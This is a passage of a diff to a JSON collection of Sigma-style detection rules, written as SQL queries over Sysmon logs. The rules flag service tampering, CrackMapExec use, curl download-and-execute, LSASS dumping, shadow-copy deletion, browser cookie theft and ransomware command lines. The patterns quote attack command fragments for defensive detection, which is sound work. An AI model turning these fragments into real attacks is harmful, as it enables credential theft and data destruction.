CommandLine LIKE '%WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%wozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%WRSVC%' ESCAPE '\\' OR CommandLine LIKE '%Zoolz 2 Service%' ESCAPE '\\') AND ((((OriginalFileName IN ('net.exe', 'net1.exe') OR (Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\')) AND CommandLine LIKE '% stop %' ESCAPE '\\') OR ((OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '%Stop-Service %' ESCAPE '\\' OR CommandLine LIKE '%Remove-Service %' ESCAPE '\\'))) OR ((OriginalFileName = 'sc.exe' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\') AND (CommandLine LIKE '% stop %' ESCAPE '\\' OR CommandLine LIKE '% delete %' ESCAPE '\\' OR CommandLine LIKE '% pause %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_openwith.yml" + "filename": "proc_creation_win_susp_service_tamper.yml" }, { - "title": "Suspicious Double Extension File Execution", - "id": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", - "status": "stable", - "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", - "author": "Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)", + "title": "Disabled IE Security Features", + "id": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", + "status": "test", + "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%.doc.exe' ESCAPE '\\' OR Image LIKE '%.docx.exe' ESCAPE '\\' OR Image LIKE '%.xls.exe' ESCAPE '\\' OR Image LIKE '%.xlsx.exe' ESCAPE '\\' OR Image LIKE '%.ppt.exe' ESCAPE '\\' OR Image LIKE '%.pptx.exe' ESCAPE '\\' OR Image LIKE '%.rtf.exe' ESCAPE '\\' OR Image LIKE '%.pdf.exe' ESCAPE '\\' OR Image LIKE '%.txt.exe' ESCAPE '\\' OR Image LIKE '% .exe' ESCAPE '\\' OR Image LIKE '%\\_\\_\\_\\_\\_\\_.exe' ESCAPE '\\' OR Image LIKE '%.doc.js' ESCAPE '\\' OR Image LIKE '%.docx.js' ESCAPE '\\' OR Image LIKE '%.xls.js' ESCAPE '\\' OR Image LIKE '%.xlsx.js' ESCAPE '\\' OR Image LIKE '%.ppt.js' ESCAPE '\\' OR Image LIKE '%.pptx.js' ESCAPE '\\' OR Image LIKE '%.rtf.js' ESCAPE '\\' OR Image LIKE '%.pdf.js' ESCAPE '\\' OR Image LIKE '%.txt.js' ESCAPE '\\') AND (CommandLine LIKE '%.doc.exe%' ESCAPE '\\' OR CommandLine LIKE '%.docx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xls.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.txt.exe%' ESCAPE '\\' OR CommandLine LIKE '% .exe%' ESCAPE '\\' OR CommandLine LIKE '%\\_\\_\\_\\_\\_\\_.exe%' ESCAPE '\\' OR CommandLine LIKE '%.doc.js%' ESCAPE '\\' OR CommandLine LIKE '%.docx.js%' ESCAPE '\\' OR CommandLine LIKE '%.xls.js%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR CommandLine LIKE '%.txt.js%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% -name IEHarden %' ESCAPE '\\' AND CommandLine LIKE '% -value 0 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DEPOff %' ESCAPE '\\' AND CommandLine LIKE 
'% -value 1 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DisableFirstRunCustomize %' ESCAPE '\\' AND CommandLine LIKE '% -value 2 %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_double_extension.yml" + "filename": "proc_creation_win_powershell_disable_ie_features.yml" }, { - "title": "Potential Signing Bypass Via Windows Developer Features", - "id": "a383dec4-deec-4e6e-913b-ed9249670848", - "status": "experimental", - "description": "Detects when a user enable developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion" - ], + "title": "HackTool - CrackMapExec Execution", + "id": "42a993dd-bb3e-48c8-b372-4d6684c4106c", + "status": "test", + "description": "This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SystemSettingsAdminFlows.exe' ESCAPE '\\' OR OriginalFileName = 'SystemSettingsAdminFlows.EXE') AND CommandLine LIKE '%TurnOnDeveloperFeatures%' ESCAPE '\\' AND (CommandLine LIKE '%DeveloperUnlock%' ESCAPE '\\' OR CommandLine LIKE '%EnableSideloading%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\crackmapexec.exe' ESCAPE '\\' OR CommandLine LIKE '% -M pe\\_inject %' ESCAPE '\\' OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -x %' ESCAPE '\\') OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -H ''NTHASH''%' ESCAPE '\\') 
OR (CommandLine LIKE '% mssql %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -H %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -o %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% --local-auth%' ESCAPE '\\')) OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% 10.%' ESCAPE '\\' AND CommandLine LIKE '% 192.168.%' ESCAPE '\\' AND CommandLine LIKE '%/24 %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml" + "filename": "proc_creation_win_hktl_crackmapexec_execution.yml" }, { "title": "Suspicious Regsvr32 Execution With Image Extension", 
@@ -12474,1656 +12115,1627 @@ "filename": "proc_creation_win_regsvr32_image.yml" }, { - "title": "Curl Download And Execute Combination", - "id": "21dd6d38-2b18-4453-9404-a0fe4a0cc288", - "status": "test", - "description": "Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.", - "author": "Sreeman, Nasreddine Bencherchali (Nextron Systems)", + "title": "Deletion of Volume Shadow Copies via WMI with PowerShell", + "id": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", + "status": "experimental", + "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "author": "Tim Rauch", "tags": [ - "attack.execution", - "attack.t1218", - "attack.command_and_control", - "attack.t1105" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '%curl %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%-o%' ESCAPE '\\' AND CommandLine LIKE '%&%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Get-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%gwmi%' ESCAPE '\\' OR CommandLine LIKE '%Get-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%gcim%' ESCAPE '\\') AND CommandLine LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (CommandLine LIKE '%.Delete()%' ESCAPE '\\' OR CommandLine LIKE '%Remove-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%rwmi%' ESCAPE '\\' OR CommandLine LIKE '%Remove-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%rcim%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_curl_download_exec_combo.yml" + "filename": 
"proc_creation_win_powershell_shadowcopy_deletion.yml" }, { - "title": "Conti NTDS Exfiltration Command", - "id": "aa92fd02-09f2-48b0-8a93-864813fb8f41", + "title": "Potential Procdump Evasion", + "id": "79b06761-465f-4f88-9ef2-150e24d3d737", "status": "test", - "description": "Detects a command used by conti to exfiltrate NTDS", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "description": "Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560" + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Cases in which procdump just gets copied to a different directory without any renaming" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%7za.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\C$\\\\temp\\\\log.zip%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%copy procdump%' ESCAPE '\\' OR CommandLine LIKE '%move procdump%' ESCAPE '\\') OR (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%.dmp %' ESCAPE '\\' AND (CommandLine LIKE '%2.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%out.dmp%' ESCAPE '\\')) OR (CommandLine LIKE '%copy lsass.exe\\_%' ESCAPE '\\' OR CommandLine LIKE '%move lsass.exe\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_conti_7zip.yml" + "filename": "proc_creation_win_sysinternals_procdump_evasion.yml" }, { - "title": "PUA - CleanWipe Execution", - "id": "f44800ac-38ec-471f-936e-3fa7d9c53100", + "title": "AADInternals PowerShell Cmdlets Execution - ProccessCreation", + "id": "c86500e9-a645-4680-98d7-f882c70c1ea3", "status": 
"experimental", - "description": "Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", + "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.reconnaissance", + "attack.discovery", + "attack.credential_access", + "attack.impact" ], "falsepositives": [ - "Legitimate administrative use (Should be investigated either way)" + "Legitimate use of the library for administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SepRemovalToolNative\\_x64.exe' ESCAPE '\\' OR (Image LIKE '%\\\\CATClean.exe' ESCAPE '\\' AND CommandLine LIKE '%--uninstall%' ESCAPE '\\') OR (Image LIKE '%\\\\NetInstaller.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR (Image LIKE '%\\\\WFPUnins.exe' ESCAPE '\\' AND CommandLine LIKE '%/uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/enterprise%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Disable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Enable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Export-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Get-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Grant-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Install-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AADInt%' ESCAPE 
'\\' OR CommandLine LIKE '%Join-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%New-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Open-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Read-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Register-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Remove-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Restore-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Search-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Send-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Set-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Start-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Update-AADInt%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_cleanwipe.yml" + "filename": "proc_creation_win_powershell_aadinternals_cmdlets_execution.yml" }, { - "title": "HackTool - Empire PowerShell UAC Bypass", - "id": "3268b746-88d8-4cd3-bffc-30077d02c787", - "status": "stable", - "description": "Detects some Empire PowerShell UAC bypass methods", - "author": "Ecco", + "title": "Renamed Vmnat.exe Execution", + "id": "7b4f794b-590a-4ad4-ba18-7964a2832205", + "status": "experimental", + "description": "Detects renamed vmnat.exe or portable version that can be used for DLL side-loading", + "author": "elhoim", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update)%' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update);%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'vmnat.exe' AND NOT ((Image LIKE '%vmnat.exe' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_hktl_empire_powershell_uac_bypass.yml" + "filename": "proc_creation_win_renamed_vmnat.yml" }, { - "title": "Renamed CreateDump Utility Execution", - "id": "1a1ed54a-2ba4-4221-94d5-01dee560d71e", - "status": "experimental", - "description": "Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious RazerInstaller Explorer Subprocess", + "id": "a4eaf250-7dc1-4842-862a-5e71cd59a167", + "status": "test", + "description": "Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM", + "author": "Florian Roth (Nextron Systems), Maxime Thiebaut", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.privilege_escalation", + "attack.t1553" ], "falsepositives": [ - "Command lines that use the same flags" + "User selecting a different installation folder (check for other sub processes of this explorer.exe process)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\' OR (CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -f %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') OR (CommandLine LIKE '% --full %' ESCAPE '\\' AND CommandLine LIKE '% --name %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\createdump.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\RazerInstaller.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND NOT (Image LIKE 'C:\\\\Windows\\\\Installer\\\\Razer\\\\Installer\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_createdump.yml" + "filename": 
"proc_creation_win_exploit_other_razorinstaller_lpe.yml" }, { - "title": "Using SettingSyncHost.exe as LOLBin", - "id": "b2ddd389-f676-4ac4-845a-e00781a48e5f", + "title": "Potential Commandline Obfuscation Using Unicode Characters", + "id": "e0552b19-5a83-4222-b141-b36184bb8d79", "status": "test", - "description": "Detects using SettingSyncHost.exe to run hijacked binary", - "author": "Anton Kutepov, oscd.community", + "description": "Detects potential commandline obfuscation using unicode characters.\nAdversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.\n", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1574.008" + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) AND (ParentCommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' AND ParentCommandLine LIKE '%RoamDiag.cmd%' ESCAPE '\\' AND ParentCommandLine LIKE '%-outputpath%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%ˣ%' ESCAPE '\\' OR CommandLine LIKE '%˪%' ESCAPE '\\' OR CommandLine LIKE '%ˢ%' ESCAPE '\\') OR (CommandLine LIKE '%∕%' ESCAPE '\\' OR CommandLine LIKE '%⁄%' ESCAPE '\\') OR (CommandLine LIKE '%―%' ESCAPE '\\' OR CommandLine LIKE '%—%' ESCAPE '\\') OR (CommandLine LIKE '%â%' ESCAPE '\\' OR CommandLine LIKE '%€%' ESCAPE '\\' OR CommandLine LIKE '%£%' ESCAPE '\\' OR CommandLine LIKE '%¯%' ESCAPE '\\' OR CommandLine LIKE '%®%' ESCAPE '\\' OR CommandLine LIKE '%µ%' ESCAPE '\\' OR CommandLine LIKE '%¶%' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_lolbin_settingsynchost.yml" + "filename": "proc_creation_win_susp_cli_obfuscation_unicode.yml" }, { - "title": "Reg Add Suspicious Paths", - "id": "b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", - "status": "experimental", - "description": "Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys", - "author": "frack113, Nasreddine Bencherchali", + "title": "Suspicious WebDav Client Execution", + "id": "982e9f2d-1a85-4d5b-aea4-31f5e97c6555", + "status": "experimental", + "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397\n", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112", - "attack.t1562.001" + "attack.exfiltration", + "attack.t1048.003", + "cve.2023.23397" ], "falsepositives": [ - "Rare legitimate add to registry via cli (to these locations)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\Currentversion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\WDigest%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-s WebClient%' ESCAPE '\\' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}') AND NOT (((CommandLine LIKE '%://10.%' ESCAPE '\\' OR CommandLine LIKE '%://192.168.%' ESCAPE '\\' OR CommandLine LIKE '%://172.16.%' ESCAPE '\\' OR CommandLine LIKE '%://172.17.%' ESCAPE '\\' OR CommandLine LIKE '%://172.18.%' ESCAPE '\\' OR CommandLine LIKE '%://172.19.%' ESCAPE '\\' OR CommandLine LIKE '%://172.20.%' ESCAPE '\\' OR CommandLine LIKE '%://172.21.%' ESCAPE '\\' OR CommandLine LIKE '%://172.22.%' ESCAPE '\\' OR CommandLine LIKE '%://172.23.%' ESCAPE '\\' OR CommandLine LIKE '%://172.24.%' ESCAPE '\\' OR CommandLine LIKE '%://172.25.%' ESCAPE '\\' OR CommandLine LIKE '%://172.26.%' ESCAPE '\\' OR CommandLine LIKE '%://172.27.%' ESCAPE '\\' OR CommandLine LIKE '%://172.28.%' ESCAPE '\\' OR CommandLine LIKE '%://172.29.%' ESCAPE '\\' OR CommandLine LIKE '%://172.30.%' ESCAPE '\\' OR CommandLine LIKE '%://172.31.%' ESCAPE '\\' OR CommandLine LIKE '%://127.%' ESCAPE '\\' OR CommandLine LIKE '%://169.254.%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_reg_susp_paths.yml" + "filename": "proc_creation_win_rundll32_webdav_client_susp_execution.yml" }, { - "title": "Email Exifiltration Via Powershell", - "id": "312d0384-401c-4b8b-abdf-685ffba9a332", + "title": "SQLite Firefox Profile Data DB Access", + "id": "4833155a-4053-4c9c-a997-777fcea0baa7", "status": "experimental", - "description": "Detects email exfiltration via powershell cmdlets", - "author": "Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea)", + "description": "Detect usage of the \"sqlite\" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.", + "author": "frack113", "tags": [ - 
"attack.exfiltration" + "attack.credential_access", + "attack.t1539", + "attack.collection", + "attack.t1005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND CommandLine LIKE '%Get-Recipient%' ESCAPE '\\' AND CommandLine LIKE '%-ExpandProperty%' ESCAPE '\\' AND CommandLine LIKE '%EmailAddresses%' ESCAPE '\\' AND CommandLine LIKE '%SmtpAddress%' ESCAPE '\\' AND CommandLine LIKE '%-hidetableheaders%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'SQLite' OR (Image LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%cookies.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%places.sqlite%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_email_exfil.yml" + "filename": "proc_creation_win_sqlite_firefox_gecko_profile_data.yml" }, { - "title": "Imports Registry Key From an ADS", - "id": "0b80ade5-6997-4b1d-99a1-71701778ea61", - "status": "test", - "description": "Detects the import of a alternate datastream to the registry with regedit.exe.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "title": "Suspicious File Download via CertOC.exe", + "id": "70ad0861-d1fe-491c-a45f-fa48148a300d", + "status": "experimental", + "description": "Detects when a user downloads file by using CertOC.exe", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1112", - "attack.defense_evasion" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regedit.exe' ESCAPE '\\' OR 
OriginalFileName = 'REGEDIT.EXE') AND ((CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\') AND CommandLine REGEXP ':[^ \\\\]')) AND NOT ((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND CommandLine LIKE '%-GetCACAPS%' ESCAPE '\\')" ], - "filename": "proc_creation_win_regedit_import_keys_ads.yml" + "filename": "proc_creation_win_lolbin_certoc_download.yml" }, { - "title": "Bypass UAC via CMSTP", - "id": "e66779cc-383e-4224-a3a4-267eeb585c40", + "title": "Potential BlackByte Ransomware Activity", + "id": "999e8307-a775-4d5f-addc-4855632335be", "status": "test", - "description": "Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files", - "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", - "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002", - "attack.t1218.003" - ], + "description": "Detects command line patterns used by BlackByte ransomware in different operations", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate use of cmstp.exe utility by legitimate user" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR OriginalFileName = 'CMSTP.EXE') AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/au%' ESCAPE '\\' OR CommandLine LIKE '%-au%' ESCAPE '\\' OR CommandLine LIKE '%/ni%' ESCAPE '\\' OR CommandLine LIKE '%-ni%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND CommandLine LIKE '% -single %' ESCAPE '\\') OR (CommandLine LIKE '%del C:\\\\Windows\\\\System32\\\\Taskmgr.exe%' ESCAPE '\\' OR CommandLine LIKE '%;Set-Service -StartupType Disabled $%' ESCAPE '\\' OR CommandLine 